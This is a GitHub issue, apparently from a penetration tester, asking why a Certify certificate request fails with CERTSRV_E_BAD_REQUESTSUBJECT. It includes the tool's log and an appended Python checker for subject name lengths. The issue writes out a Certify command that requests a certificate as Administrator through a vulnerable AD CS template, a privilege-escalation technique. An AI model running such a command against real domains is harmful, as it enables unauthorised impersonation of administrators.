
The submission failed: Error Parsing Request The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT)

Open sm00v opened this issue 1 year ago • 2 comments

Getting this error while running: certify.exe request /ca:CASERVER.thisisalongdomainlol.com\Issuing-External-CA /template:VulnTemplate /altname:Administrator

My Subject name according to certify is: CN=TEST2\, Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com

Any ideas on how to deal with this error? Sounds like a legitimate issue for which you have to permit longer than 64 character subject names on the ADCS server according to this: https://www.open-a-socket.com/2014/07/24/the-request-subject-name-is-invalid-or-too-long/

Below is the full output with redacted info. This pentest is about to end, but it might help the next person if this gets answered.

[*] Current user context    : thisisalongdomainlol\Contos
[*] No subject name specified, using current context as subject.

[*] Template                : VulnTemplate 
[*] Subject                 : CN=TEST2\,  Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com
[*] AltName                 : administrator

[*] Certificate Authority   : CASERVER.thisisalongdomainlol.com\Issuing-External-CA

[!] CA Response             : The submission failed: Error Parsing Request  The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT)
[!] Last status             : 0x80094001
[*] Request ID              : 0

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
abcde
-----END RSA PRIVATE KEY-----

[X] Error downloading certificate: CCertRequest::RetrievePending: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx


Certify completed in 00:00:08.5331567

Hopefully there is something that can be done rather than running a command on the AD CS server :/

sm00v avatar May 16 '23 20:05 sm00v
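Added example, not code from Certify or from the issue author: a small client-side check that splits an LDAP-style subject DN into its RDNs (handling `\,`, `\\` and `\2C`-style escapes) and compares each value against the X.520 upper bounds (64 characters for CN, OU and O; 128 for L and ST; 2 for C). The limit table is my assumption about what a Windows CA applies when it enforces X.500 name lengths, which is the limit the linked post discusses; the CA can reject a subject for other reasons too, so a passing check only rules out the length cause. The first input is the subject string printed in the issue above; the over-long CN is constructed.

```python
"""Check each RDN value of a subject DN against X.520 upper bounds.

Added example, not part of Certify. Assumption: the CA enforces the
per-attribute X.520 limits below (CN/OU/O 64, L/ST 128, C 2) when
X.500 name-length enforcement is on; other attribute types are reported
without a limit.
"""
import re

# X.520 upper bounds for the attribute types a CA commonly sees (assumed
# to match the CA's enforcement; attribute types not listed are unchecked).
RDN_LIMITS = {"CN": 64, "OU": 64, "O": 64, "L": 128, "ST": 128, "C": 2}

# Subject string as printed in the issue (single space after the escaped comma).
ISSUE_SUBJECT = (r"CN=TEST2\, Contos, OU=Test Accounts, OU=Users, OU=Live, "
                 r"OU=ABC, DC=thisisalongdomainlol, DC=com")

# Constructed input: a CN one character over the 64-character bound.
LONG_CN_SUBJECT = "CN=" + "a" * 65 + ", DC=example, DC=test"

_HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")


def split_rdns(dn):
    """Split a DN on unescaped commas, resolving RFC 4514 backslash escapes.

    A `\\,` stays inside its RDN as a literal comma; `\\2C` is decoded from
    its hex pair. Multi-valued RDNs (joined with `+`) are not split further.
    """
    rdns, buf, i = [], [], 0
    while i < len(dn):
        ch = dn[i]
        if ch == "\\" and i + 1 < len(dn):
            pair = dn[i + 1:i + 3]
            if len(pair) == 2 and _HEX_PAIR.fullmatch(pair):
                buf.append(chr(int(pair, 16)))  # hex-pair escape, e.g. \2C
                i += 3
            else:
                buf.append(dn[i + 1])  # single-character escape, e.g. \,
                i += 2
            continue
        if ch == ",":
            rdns.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
        i += 1
    rdns.append("".join(buf).strip())
    return [r for r in rdns if r]


def check_subject(dn):
    """Return (type, value, length, limit, ok) for every RDN in the DN."""
    report = []
    for rdn in split_rdns(dn):
        attr_type, _, value = rdn.partition("=")  # types never contain '='
        attr_type, value = attr_type.strip().upper(), value.strip()
        limit = RDN_LIMITS.get(attr_type)
        ok = limit is None or len(value) <= limit
        report.append((attr_type, value, len(value), limit, ok))
    return report


def violations(dn):
    """List the (type, length, limit) triples that exceed their bound."""
    return [(t, n, lim) for t, _v, n, lim, ok in check_subject(dn) if not ok]


if __name__ == "__main__":
    for label, subject in (("issue subject", ISSUE_SUBJECT),
                           ("constructed long CN", LONG_CN_SUBJECT)):
        print(f"== {label}")
        for attr_type, value, length, limit, ok in check_subject(subject):
            bound = "no limit" if limit is None else f"max {limit}"
            print(f"  {'OK ' if ok else 'BAD'} {attr_type}={value[:40]!r:<44}"
                  f" len={length} ({bound})")
        print("  violations:", violations(subject) or "none")
```

Run against the subject from the issue, every RDN is well inside its bound (the longest value is 20 characters), so on that CA the error is unlikely to be the per-RDN length alone; the escaped comma in the CN is the part worth looking at next, since it is the one feature of this subject that a parser can mishandle. The constructed input shows what a genuine length violation reports.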